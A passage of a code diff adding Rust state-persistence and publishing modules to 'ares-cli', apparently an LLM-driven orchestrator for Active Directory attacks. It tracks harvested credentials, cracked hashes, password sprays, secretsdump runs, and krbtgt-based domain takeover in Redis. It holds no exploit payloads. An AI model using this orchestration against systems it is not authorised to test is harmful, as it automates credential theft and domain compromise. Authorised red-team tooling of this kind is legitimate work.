DEDUP_SPIDERED_SHARES: &str = "spidered_shares"; +pub const DEDUP_EXPANSION_CREDS: &str = "expansion_creds"; +pub const DEDUP_ASREP_DOMAINS: &str = "asrep_domains"; +pub const DEDUP_USERNAME_SPRAY: &str = "username_spray"; +pub const DEDUP_PASSWORD_SPRAY: &str = "password_spray"; +pub const DEDUP_ESC8_SERVERS: &str = "esc8_servers"; +pub const DEDUP_COERCED_DCS: &str = "coerced_dcs"; +pub const DEDUP_WRITABLE_SHARES: &str = "writable_shares"; +pub const DEDUP_HASH_LATERAL: &str = "hash_lateral"; +pub const DEDUP_SCANNED_TARGETS: &str = "scanned_targets"; +pub const DEDUP_ACL_STEPS: &str = "acl_steps"; +pub const DEDUP_TRUST_FOLLOW: &str = "trust_follow"; +pub const DEDUP_S4U_EXPLOITS: &str = "s4u_exploits"; +pub const DEDUP_GMSA_ACCOUNTS: &str = "gmsa_accounts"; +pub const DEDUP_LOW_HANGING: &str = "low_hanging"; +pub const DEDUP_CRED_SECRETSDUMP: &str = "cred_secretsdump"; +pub const DEDUP_SHARE_ENUM: &str = "share_enum"; + +/// Vuln queue ZSET key suffix. +pub const KEY_VULN_QUEUE: &str = "vuln_queue"; + +/// Discovery list key prefix (NOT under ares:op:). +pub const DISCOVERY_KEY_PREFIX: &str = "ares:discoveries"; + +const ALL_DEDUP_SETS: &[&str] = &[ + DEDUP_CRACK_REQUESTS, + DEDUP_SECRETSDUMP, + DEDUP_DELEGATION_CREDS, + DEDUP_ADCS_SERVERS, + DEDUP_BLOODHOUND_DOMAINS, + DEDUP_SPIDERED_SHARES, + DEDUP_EXPANSION_CREDS, + DEDUP_ASREP_DOMAINS, + DEDUP_USERNAME_SPRAY, + DEDUP_PASSWORD_SPRAY, + DEDUP_ESC8_SERVERS, + DEDUP_COERCED_DCS, + DEDUP_WRITABLE_SHARES, + DEDUP_HASH_LATERAL, + DEDUP_SCANNED_TARGETS, + DEDUP_ACL_STEPS, + DEDUP_TRUST_FOLLOW, + DEDUP_S4U_EXPLOITS, + DEDUP_SHARE_ENUM, + DEDUP_GMSA_ACCOUNTS, + DEDUP_LOW_HANGING, + DEDUP_CRED_SECRETSDUMP, +]; diff --git a/ares-cli/src/orchestrator/state/persistence.rs b/ares-cli/src/orchestrator/state/persistence.rs new file mode 100644 index 00000000..8402822d --- /dev/null +++ b/ares-cli/src/orchestrator/state/persistence.rs @@ -0,0 +1,330 @@ +//! Redis persistence — load_from_redis & refresh_from_redis. 
diff --git a/ares-cli/src/orchestrator/state/persistence.rs b/ares-cli/src/orchestrator/state/persistence.rs new file mode 100644 index 00000000..8402822d --- /dev/null +++ b/ares-cli/src/orchestrator/state/persistence.rs @@ -0,0 +1,330 @@ +//! Redis persistence — load_from_redis & refresh_from_redis. + +use std::collections::{HashMap, HashSet}; + +use anyhow::{Context, Result}; +use redis::AsyncCommands; +use tracing::{debug, info}; + +use ares_core::state::{self, RedisStateReader}; + +use super::{SharedState, ALL_DEDUP_SETS, DEDUP_ACL_STEPS}; +use crate::orchestrator::task_queue::TaskQueue; + +impl SharedState { + /// Load state from Redis (called at startup). + pub async fn load_from_redis(&self, queue: &TaskQueue) -> Result<()> { + let mut conn = queue.connection(); + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + + let reader = RedisStateReader::new(operation_id.clone()); + + // Load collections + let loaded = reader + .load_state(&mut conn) + .await + .context("Failed to load state from Redis")?; + + let loaded = match loaded { + Some(s) => s, + None => { + info!(operation_id = %operation_id, "No existing state in Redis — starting fresh"); + return Ok(()); + } + }; + + // Load dedup sets + let mut dedup_sets: HashMap<String, HashSet<String>> = HashMap::new(); + for set_name in ALL_DEDUP_SETS { + let key = format!( + "{}:{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DEDUP_PREFIX, + set_name + ); + let members: HashSet<String> = conn.smembers(&key).await.unwrap_or_default(); + if !members.is_empty() { + debug!(set = set_name, count = members.len(), "Loaded dedup set"); + } + dedup_sets.insert(set_name.to_string(), members); + } + + // Load MSSQL enum dispatched + let mssql_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_MSSQL_ENUM_DISPATCHED + ); + let mssql_dispatched: HashSet<String> = conn.smembers(&mssql_key).await.unwrap_or_default(); + + // Load domain SIDs + let domain_sids_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DOMAIN_SIDS + ); + let domain_sids: HashMap<String, String> = + conn.hgetall(&domain_sids_key).await.unwrap_or_default(); + + // Load RID-500 admin account names + let admin_names_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_ADMIN_NAMES + ); + let admin_names: HashMap<String, String> = + conn.hgetall(&admin_names_key).await.unwrap_or_default(); + + // Load trusted domains + let trusted_domains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_TRUSTED_DOMAINS + ); + let raw_trusts: HashMap<String, String> = + conn.hgetall(&trusted_domains_key).await.unwrap_or_default(); + let mut trusted_domains = HashMap::new(); + for (domain, json_str) in &raw_trusts { + if let Ok(trust) = serde_json::from_str::<ares_core::models::TrustInfo>(json_str) { + trusted_domains.insert(domain.clone(), trust); + } + } + + // Load ACL chains + let acl_chains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_ACL_CHAINS + ); + let acl_chains_raw: Vec<String> = conn + .lrange(&acl_chains_key, 0, -1) + .await + .unwrap_or_default(); + let acl_chains: Vec<serde_json::Value> = acl_chains_raw + .iter() + .filter_map(|s| serde_json::from_str(s).ok()) + .collect(); + + // Load pending tasks from Redis HASH + let pending_tasks_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_PENDING_TASKS + ); + let raw_pending: std::collections::HashMap<String, String> = + conn.hgetall(&pending_tasks_key).await.unwrap_or_default(); + let mut pending_tasks = std::collections::HashMap::new(); + for (task_id, json_str) in &raw_pending { + if let Ok(task_info) = serde_json::from_str::<ares_core::models::TaskInfo>(json_str) { + pending_tasks.insert(task_id.clone(), task_info); + } + } + + // Load completed tasks from Redis HASH + let completed_tasks_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_COMPLETED_TASKS + );
+ let raw_completed: std::collections::HashMap<String, String> = + conn.hgetall(&completed_tasks_key).await.unwrap_or_default(); + let mut completed_tasks = std::collections::HashMap::new(); + for (task_id, json_str) in &raw_completed { + if let Ok(task_result) = serde_json::from_str::<ares_core::models::TaskResult>(json_str) + { + completed_tasks.insert(task_id.clone(), task_result); + } + } + + // Load dispatched ACL steps from dedup set + let acl_dedup_key = format!( + "{}:{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DEDUP_PREFIX, + DEDUP_ACL_STEPS + ); + let dispatched_acl_steps: HashSet<String> = + conn.smembers(&acl_dedup_key).await.unwrap_or_default(); + + // Apply to state + let mut state = self.inner.write().await; + state.target = loaded.target; + state.target_ips = loaded.target_ips; + state.credentials = loaded.all_credentials; + state.hashes = loaded.all_hashes; + state.hosts = loaded.all_hosts; + state.users = loaded.all_users; + state.shares = loaded.all_shares; + state.domains = loaded.all_domains; + state.discovered_vulnerabilities = loaded.discovered_vulnerabilities; + state.exploited_vulnerabilities = loaded.exploited_vulnerabilities; + state.domain_controllers = loaded.domain_controllers; + state.netbios_to_fqdn = loaded.netbios_to_fqdn; + state.domain_sids = domain_sids; + state.admin_names = admin_names; + state.trusted_domains = trusted_domains; + // Rebuild dominated_domains from krbtgt hashes + state.dominated_domains = state + .hashes + .iter() + .filter(|h| { + h.username.to_lowercase() == "krbtgt" && h.hash_type.to_lowercase().contains("ntlm") + }) + .map(|h| { + if h.domain.is_empty() { + state.domains.first().cloned().unwrap_or_default() + } else { + h.domain.to_lowercase() + } + }) + .filter(|d| !d.is_empty()) + .collect(); + state.has_domain_admin = loaded.has_domain_admin; + state.has_golden_ticket = loaded.has_golden_ticket; + state.domain_admin_path = loaded.domain_admin_path; + state.dedup = dedup_sets; + state.mssql_enum_dispatched = mssql_dispatched; + state.acl_chains = acl_chains; + state.dispatched_acl_steps = dispatched_acl_steps; + state.pending_tasks = pending_tasks; + state.completed_tasks = completed_tasks; + + let cred_count = state.credentials.len(); + let hash_count = state.hashes.len(); + let host_count = state.hosts.len(); + let vuln_count = state.discovered_vulnerabilities.len(); + drop(state); + + info!( + operation_id = %operation_id, + credentials = cred_count, + hashes = hash_count, + hosts = host_count, + vulnerabilities = vuln_count, + "State loaded from Redis" + ); + + Ok(()) + } + + /// Refresh state from Redis (periodic sync).
+ pub async fn refresh_from_redis(&self, queue: &TaskQueue) -> Result<()> { + let mut conn = queue.connection(); + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id.clone()); + + let credentials = reader.get_credentials(&mut conn).await.unwrap_or_default(); + let hashes = reader.get_hashes(&mut conn).await.unwrap_or_default(); + let hosts = reader.get_hosts(&mut conn).await.unwrap_or_default(); + let vulns = reader + .get_vulnerabilities(&mut conn) + .await + .unwrap_or_default(); + let exploited = reader + .get_exploited_vulnerabilities(&mut conn) + .await + .unwrap_or_default(); + let meta = reader.get_meta(&mut conn).await.unwrap_or_default(); + let dc_map = reader.get_dc_map(&mut conn).await.unwrap_or_default(); + + // Load domain SIDs + let domain_sids_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DOMAIN_SIDS + ); + let domain_sids: HashMap<String, String> = + conn.hgetall(&domain_sids_key).await.unwrap_or_default(); + + // Load RID-500 admin account names + let admin_names_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_ADMIN_NAMES + ); + let admin_names: HashMap<String, String> = + conn.hgetall(&admin_names_key).await.unwrap_or_default(); + + // Refresh ACL chains + let acl_chains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_ACL_CHAINS + ); + let acl_chains_raw: Vec<String> = conn + .lrange(&acl_chains_key, 0, -1) + .await + .unwrap_or_default(); + let acl_chains: Vec<serde_json::Value> = acl_chains_raw + .iter() + .filter_map(|s| serde_json::from_str(s).ok()) + .collect(); + + // Refresh trusted domains + let trusted_domains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_TRUSTED_DOMAINS + ); + let raw_trusts: HashMap<String, String> = + conn.hgetall(&trusted_domains_key).await.unwrap_or_default(); + let mut trusted_domains = HashMap::new(); + for (domain, json_str) in &raw_trusts { + if let Ok(trust) = serde_json::from_str::<ares_core::models::TrustInfo>(json_str) { + trusted_domains.insert(domain.clone(), trust); + } + } + + let mut state = self.inner.write().await; + state.credentials = credentials; + state.hashes = hashes; + state.hosts = hosts; + state.discovered_vulnerabilities = vulns; + state.exploited_vulnerabilities = exploited; + state.has_domain_admin = meta.has_domain_admin; + state.has_golden_ticket = meta.has_golden_ticket; + state.domain_admin_path = meta.domain_admin_path; + state.domain_controllers = dc_map; + state.domain_sids = domain_sids; + state.admin_names = admin_names; + state.trusted_domains = trusted_domains; + state.acl_chains = acl_chains; + // Rebuild dominated_domains from refreshed hashes + state.dominated_domains = state + .hashes + .iter() + .filter(|h| { + h.username.to_lowercase() == "krbtgt" && h.hash_type.to_lowercase().contains("ntlm") + }) + .map(|h| { + if h.domain.is_empty() { + state.domains.first().cloned().unwrap_or_default() + } else { + h.domain.to_lowercase() + } + }) + .filter(|d| !d.is_empty()) + .collect(); + + Ok(()) + } +}
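Both loaders rebuild `dominated_domains` with the same filter/map chain, so the rule is worth stating in isolation: a domain counts as dominated exactly when a krbtgt NTLM hash for it sits in state. A pure-std sketch — `MiniHash` and `dominated_domains` are invented for the example, and the real code additionally falls back to the first known domain when a hash carries an empty domain:

```rust
// Illustrative sketch only — the dominated-domains rule from the two
// loaders above, minus the empty-domain fallback.
struct MiniHash {
    username: String,
    hash_type: String,
    domain: String,
}

fn dominated_domains(hashes: &[MiniHash]) -> std::collections::HashSet<String> {
    hashes
        .iter()
        .filter(|h| {
            h.username.eq_ignore_ascii_case("krbtgt")
                && h.hash_type.to_lowercase().contains("ntlm")
        })
        .map(|h| h.domain.to_lowercase())
        .filter(|d| !d.is_empty())
        .collect()
}

#[test]
fn krbtgt_ntlm_marks_domain_dominated() {
    let hashes = vec![MiniHash {
        username: "KRBTGT".into(),
        hash_type: "NTLM".into(),
        domain: "CHILD.CONTOSO.LOCAL".into(),
    }];
    assert!(dominated_domains(&hashes).contains("child.contoso.local"));
}
```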
diff --git a/ares-cli/src/orchestrator/state/publishing/credentials.rs b/ares-cli/src/orchestrator/state/publishing/credentials.rs new file mode 100644 index 00000000..289b6311 --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/credentials.rs @@ -0,0 +1,221 @@ +//! Credential and hash publishing methods. + +use anyhow::Result; + +use ares_core::models::{Credential, Hash}; +use ares_core::state::{self, RedisStateReader}; + +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +use super::sanitize_credential; + +impl SharedState { + /// Add a credential to state and Redis (with dedup). + /// + /// Sanitizes the credential before storage (strips "Password:" prefix, trailing + /// metadata, normalizes domains, rejects noise). When the credential's domain is + /// a valid FQDN (contains a dot), it is automatically added to `state.domains` + /// (matches Python's `add_credential()` behavior). + pub async fn publish_credential(&self, queue: &TaskQueue, cred: Credential) -> Result<bool> { + // Sanitize and validate before storage + let netbios_map = { + let state = self.inner.read().await; + state.netbios_to_fqdn.clone() + }; + let cred = match sanitize_credential(cred, &netbios_map) { + Some(c) => c, + None => return Ok(false), + }; + + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id.clone()); + let mut conn = queue.connection(); + let added = reader.add_credential(&mut conn, &cred).await?; + if added { + // Auto-extract domain from credential (matches Python add_credential) + let cred_domain = cred.domain.to_lowercase(); + if cred_domain.contains('.') { + let mut state = self.inner.write().await; + if !state.domains.contains(&cred_domain) { + state.domains.push(cred_domain.clone()); + let domain_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DOMAINS, + ); + let _: Result<(), _> = + redis::AsyncCommands::sadd(&mut conn, &domain_key, &cred_domain).await; + let _: Result<(), _> = + redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; + tracing::info!( + domain = %cred_domain, + username = %cred.username, + "Auto-extracted domain from credential" + ); + } + state.credentials.push(cred); + } else { + let mut state = self.inner.write().await; + state.credentials.push(cred); + } + } + Ok(added) + } + + /// Add a hash to state and Redis (with dedup). + /// + /// When a `krbtgt` NTLM hash is stored, `has_domain_admin` is automatically + /// set — mirroring Python's `add_hash()` behaviour so that `auto_golden_ticket` + /// triggers without requiring the LLM to emit a structured JSON payload.
+ pub async fn publish_hash(&self, queue: &TaskQueue, hash: Hash) -> Result<bool> { + use ares_core::models::VulnerabilityInfo; + use std::collections::HashMap; + + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + let added = reader.add_hash(&mut conn, &hash).await?; + if added { + let is_krbtgt = hash.username.to_lowercase() == "krbtgt" + && hash.hash_type.to_lowercase().contains("ntlm"); + let hash_domain = hash.domain.clone(); + let mut state = self.inner.write().await; + state.hashes.push(hash); + + // Track per-domain domination when krbtgt NTLM hash arrives + if is_krbtgt { + let krbtgt_domain = if hash_domain.is_empty() { + state.domains.first().cloned().unwrap_or_default() + } else { + hash_domain.to_lowercase() + }; + if !krbtgt_domain.is_empty() { + state.dominated_domains.insert(krbtgt_domain.clone()); + tracing::info!(domain = %krbtgt_domain, "Domain dominated (krbtgt hash obtained)"); + } + + // Resolve DC target IP for vulnerability entry + let dc_target = state + .domain_controllers + .get(&krbtgt_domain) + .cloned() + .unwrap_or_else(|| krbtgt_domain.clone()); + + // Auto-set domain admin when first krbtgt NTLM hash arrives (matches Python) + if !state.has_domain_admin { + drop(state); + let path = Some("secretsdump → krbtgt NTLM hash".to_string()); + if let Err(e) = self.set_domain_admin(queue, path).await { + tracing::warn!(err = %e, "Failed to auto-set domain admin from krbtgt hash"); + } else { + tracing::info!( + "🎯 Domain Admin auto-set from krbtgt NTLM hash in publish_hash" + ); + } + } else { + drop(state); + } + + // Synthesize a dc_secretsdump vulnerability so the discovered + // vulnerabilities list reflects the DA achievement path. + let vuln_id = format!("dc_secretsdump_{}", krbtgt_domain); + let mut details = HashMap::new(); + details.insert( + "domain".into(), + serde_json::Value::String(krbtgt_domain.clone()), + ); + details.insert( + "note".into(), + serde_json::Value::String( + "Domain controller compromised via secretsdump — krbtgt NTLM hash extracted" + .to_string(), + ), + ); + let vuln = VulnerabilityInfo { + vuln_id: vuln_id.clone(), + vuln_type: "dc_secretsdump".to_string(), + target: dc_target, + discovered_by: "credential_access".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 1, + }; + let _ = self.publish_vulnerability(queue, vuln).await; + let _ = self.mark_exploited(queue, &vuln_id).await; + } + } + Ok(added) + }
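The whole DA-auto-set cascade hangs off one predicate, reproduced here standalone so the trigger condition is easy to eyeball (`is_krbtgt_ntlm` is a hypothetical helper for illustration, not in the patch):

```rust
// Illustrative sketch only — the condition publish_hash uses to decide a
// hash represents domain domination.
fn is_krbtgt_ntlm(username: &str, hash_type: &str) -> bool {
    username.eq_ignore_ascii_case("krbtgt") && hash_type.to_lowercase().contains("ntlm")
}

#[test]
fn krbtgt_trigger_conditions() {
    assert!(is_krbtgt_ntlm("KRBTGT", "NTLM"));
    assert!(is_krbtgt_ntlm("krbtgt", "ntlm_history")); // substring match fires too
    assert!(!is_krbtgt_ntlm("Administrator", "NTLM"));
    assert!(!is_krbtgt_ntlm("krbtgt", "krb5tgs"));
}
```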
+ /// Update a hash's `cracked_password` field in memory and Redis. + /// + /// Finds the first hash matching the given username and domain (case-insensitive) + /// that has no cracked password yet, sets it, and persists the change to the Redis + /// HASH by scanning fields and updating the matching entry. + pub async fn update_hash_cracked_password( + &self, + queue: &TaskQueue, + username: &str, + domain: &str, + password: &str, + ) -> Result<bool> { + // Update in-memory state and capture the updated hash for Redis persist + let (op_id, hash_type) = { + let mut state = self.inner.write().await; + let idx = state.hashes.iter().position(|h| { + h.username.eq_ignore_ascii_case(username) + && h.domain.eq_ignore_ascii_case(domain) + && h.cracked_password.is_none() + }); + match idx { + Some(i) => { + state.hashes[i].cracked_password = Some(password.to_string()); + let ht = state.hashes[i].hash_type.clone(); + (state.operation_id.clone(), ht) + } + None => return Ok(false), + } + }; + + // Persist to Redis HASH: scan fields, find the matching entry, update it + let hash_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HASHES,); + let mut conn = queue.connection(); + let entries: std::collections::HashMap<String, String> = + redis::AsyncCommands::hgetall(&mut conn, &hash_key) + .await + .unwrap_or_default(); + for (field, value) in &entries { + if let Ok(mut h) = serde_json::from_str::<Hash>(value) { + if h.username.eq_ignore_ascii_case(username) + && h.domain.eq_ignore_ascii_case(domain) + && h.cracked_password.is_none() + { + h.cracked_password = Some(password.to_string()); + let updated_json = serde_json::to_string(&h).unwrap_or_default(); + let _: Result<(), _> = + redis::AsyncCommands::hset(&mut conn, &hash_key, field, &updated_json) + .await; + break; + } + } + } + + tracing::info!( + username = %username, + domain = %domain, + hash_type = %hash_type, + "Hash cracked_password updated in state and Redis" + ); + + Ok(true) + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/entities.rs b/ares-cli/src/orchestrator/state/publishing/entities.rs new file mode 100644 index 00000000..e165026b --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/entities.rs @@ -0,0 +1,252 @@ +//! Entity publishing: users, vulnerabilities, shares, timeline, tasks, netbios, trusts. + +use anyhow::Result; +use redis::AsyncCommands; + +use ares_core::models::{Share, User, VulnerabilityInfo}; +use ares_core::state::{self, RedisStateReader}; + +use crate::orchestrator::state::{SharedState, KEY_VULN_QUEUE}; +use crate::orchestrator::task_queue::TaskQueue; + +impl SharedState { + /// Add a user to state and Redis (with dedup). + pub async fn publish_user(&self, queue: &TaskQueue, user: User) -> Result<bool> { + // Check for duplicate in memory + { + let state = self.inner.read().await; + let dedup = format!( + "{}@{}", + user.username.to_lowercase(), + user.domain.to_lowercase() + ); + if state.users.iter().any(|u| { + format!("{}@{}", u.username.to_lowercase(), u.domain.to_lowercase()) == dedup + }) { + return Ok(false); + } + } + + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + let added = reader.add_user(&mut conn, &user).await?; + if added { + let mut state = self.inner.write().await; + state.users.push(user); + } + Ok(added) + } + + /// Add a vulnerability to state and Redis.
+ pub async fn publish_vulnerability( + &self, + queue: &TaskQueue, + vuln: VulnerabilityInfo, + ) -> Result<bool> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id.clone()); + let mut conn = queue.connection(); + let added = reader.add_vulnerability(&mut conn, &vuln).await?; + if added { + // Also add to vuln queue ZSET for exploitation workflow + let vuln_queue_key = + format!("{}:{}:{}", state::KEY_PREFIX, operation_id, KEY_VULN_QUEUE); + let vuln_json = serde_json::to_string(&vuln).unwrap_or_default(); + let score = vuln.priority as f64; + let _: () = conn + .zadd(&vuln_queue_key, &vuln_json, score) + .await + .unwrap_or(()); + let _: () = conn.expire(&vuln_queue_key, 86400).await.unwrap_or(()); + + let mut state = self.inner.write().await; + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + Ok(added) + } + + /// Add a share to state and Redis (with dedup). + pub async fn publish_share(&self, queue: &TaskQueue, share: Share) -> Result<bool> { + // Check for duplicate in memory + { + let state = self.inner.read().await; + if state.shares.iter().any(|s| { + s.host.to_lowercase() == share.host.to_lowercase() + && s.name.to_lowercase() == share.name.to_lowercase() + }) { + return Ok(false); + } + } + + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + let added = reader.add_share(&mut conn, &share).await?; + if added { + let mut state = self.inner.write().await; + state.shares.push(share); + } + Ok(added) + } + + /// Persist a timeline event to Redis and add MITRE techniques. + pub async fn persist_timeline_event( + &self, + queue: &TaskQueue, + event: &serde_json::Value, + mitre_techniques: &[String], + ) -> Result<()> { + let operation_id = { + let let_state = self.inner.read().await; + let_state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + + reader.add_timeline_event(&mut conn, event).await?; + + for technique in mitre_techniques { + let _ = reader.add_technique(&mut conn, technique).await; + } + + Ok(()) + } + + /// Record a pending task in memory and persist to Redis HASH. + /// + /// Key: `ares:op:{id}:pending_tasks` — matches Python's state_backend. + pub async fn track_pending_task( + &self, + queue: &TaskQueue, + task: ares_core::models::TaskInfo, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let task_id = task.task_id.clone(); + let json = serde_json::to_string(&task).unwrap_or_default(); + + // Persist to Redis + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_PENDING_TASKS, + ); + let mut conn = queue.connection(); + let _: Result<(), _> = redis::AsyncCommands::hset(&mut conn, &key, &task_id, &json).await; + let _: Result<(), _> = redis::AsyncCommands::expire(&mut conn, &key, 86400i64).await; + + // Update in-memory state + let mut state = self.inner.write().await; + state.pending_tasks.insert(task_id, task); + Ok(()) + }
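`track_pending_task` just above uses the HSET-then-EXPIRE idiom that recurs throughout this module, and `complete_task` below pairs it with an HDEL on the sibling key. A sketch of the shape against redis-rs — the key name and helper are hypothetical, and exact method signatures may differ across redis crate versions:

```rust
// Illustrative sketch only — the persist-with-TTL idiom used by the task
// tracking methods; "ares:op:demo:pending_tasks" is an invented key.
use redis::AsyncCommands;

async fn persist_with_ttl(
    conn: &mut redis::aio::MultiplexedConnection,
    task_id: &str,
    task_json: &str,
) -> redis::RedisResult<()> {
    let _: () = conn
        .hset("ares:op:demo:pending_tasks", task_id, task_json)
        .await?;
    // The TTL renews on every write, so active operations never expire mid-run.
    conn.expire("ares:op:demo:pending_tasks", 86400).await
}
```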
+ /// Move a task from pending to completed, persisting both changes to Redis. + /// + /// Keys: `ares:op:{id}:pending_tasks`, `ares:op:{id}:completed_tasks` + pub async fn complete_task( + &self, + queue: &TaskQueue, + task_id: &str, + result: ares_core::models::TaskResult, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let result_json = serde_json::to_string(&result).unwrap_or_default(); + + let pending_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_PENDING_TASKS, + ); + let completed_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_COMPLETED_TASKS, + ); + + let mut conn = queue.connection(); + // Remove from pending, add to completed + let _: Result<(), _> = redis::AsyncCommands::hdel(&mut conn, &pending_key, task_id).await; + let _: Result<(), _> = + redis::AsyncCommands::hset(&mut conn, &completed_key, task_id, &result_json).await; + let _: Result<(), _> = + redis::AsyncCommands::expire(&mut conn, &completed_key, 86400i64).await; + + // Update in-memory state + let mut state = self.inner.write().await; + state.pending_tasks.remove(task_id); + state.completed_tasks.insert(task_id.to_string(), result); + Ok(()) + } + + /// Persist a NetBIOS to FQDN mapping to Redis HASH. + /// + /// Key: `ares:op:{id}:netbios_map` — matches Python's `HSET` on netbios_map. + pub async fn publish_netbios( + &self, + queue: &TaskQueue, + netbios: &str, + fqdn: &str, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_NETBIOS_MAP, + ); + let mut conn = queue.connection(); + let _: () = redis::AsyncCommands::hset(&mut conn, &key, netbios, fqdn).await?; + let _: () = redis::AsyncCommands::expire(&mut conn, &key, 86400i64).await?; + + let mut state = self.inner.write().await; + state + .netbios_to_fqdn + .insert(netbios.to_string(), fqdn.to_string()); + Ok(()) + } + + /// Add a trust relationship to state and Redis. + pub async fn publish_trust_info( + &self, + queue: &TaskQueue, + trust: ares_core::models::TrustInfo, + ) -> Result<bool> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + let added = reader.add_trusted_domain(&mut conn, &trust).await?; + if added { + let domain_key = trust.domain.to_lowercase(); + let mut state = self.inner.write().await; + state.trusted_domains.insert(domain_key, trust); + } + Ok(added) + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/hosts.rs b/ares-cli/src/orchestrator/state/publishing/hosts.rs new file mode 100644 index 00000000..34c908b9 --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/hosts.rs @@ -0,0 +1,342 @@ +//! Host and domain controller publishing methods. + +use anyhow::Result; +use redis::AsyncCommands; + +use ares_core::models::Host; +use ares_core::state::{self, RedisStateReader}; + +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +use super::is_aws_hostname; + +impl SharedState { + /// Add a host to state and Redis. + /// + /// Merges data when a host with the same IP already exists: upgrades DC + /// status, fills in hostname, and keeps the richer service list. + /// AWS internal hostnames (e.g. `ip-10-1-2-150.us-west-2.compute.internal`) + /// are stripped to allow real AD FQDNs to take precedence. + /// + /// When the hostname is a valid AD FQDN (e.g.
`dc01.contoso.local`), the + /// domain suffix is automatically extracted and added to `state.domains` + /// (matches Python's `add_host()` behavior). + pub async fn publish_host(&self, queue: &TaskQueue, host: Host) -> Result<bool> { + // Normalize hostname: strip trailing dots and AWS internal names + let mut host = host; + host.hostname = host.hostname.trim_end_matches('.').to_lowercase(); + if is_aws_hostname(&host.hostname) { + host.hostname = String::new(); + } + + // Auto-extract domain from FQDN hostname (matches Python add_host) + // e.g. "dc02.child.contoso.local" → "child.contoso.local" + if !host.hostname.is_empty() + && host.hostname.contains('.') + && !is_aws_hostname(&host.hostname) + { + let hostname_clean = host.hostname.trim_end_matches('.'); + let parts: Vec<&str> = hostname_clean.split('.').collect(); + if parts.len() >= 3 { + let domain = parts[1..].join(".").to_lowercase(); + // Reject AWS/cloud domains + if !domain.contains("compute.internal") && !domain.contains("amazonaws.com") { + let op_id = self.inner.read().await.operation_id.clone(); + let mut state = self.inner.write().await; + if !state.domains.contains(&domain) { + state.domains.push(domain.clone()); + let domain_key = + format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS,); + let mut conn = queue.connection(); + let _: Result<(), _> = + redis::AsyncCommands::sadd(&mut conn, &domain_key, &domain).await; + let _: Result<(), _> = + redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; + tracing::info!( + hostname = %host.hostname, + domain = %domain, + "Auto-extracted domain from host FQDN" + ); + } + } + + // Auto-populate netbios_to_fqdn map so CLI can resolve short names. + // e.g. "dc02.child.contoso.local" → DC02 → dc02.child.contoso.local + let short_name = parts[0].to_uppercase(); + let fqdn = host.hostname.to_lowercase(); + let _ = self.publish_netbios(queue, &short_name, &fqdn).await; + } + } + + // Check for existing host with same IP or hostname and merge if the + // new entry brings richer data (DC detection, more services, hostname). + // Returns (needs_dc_registration, was_merged_and_changed).
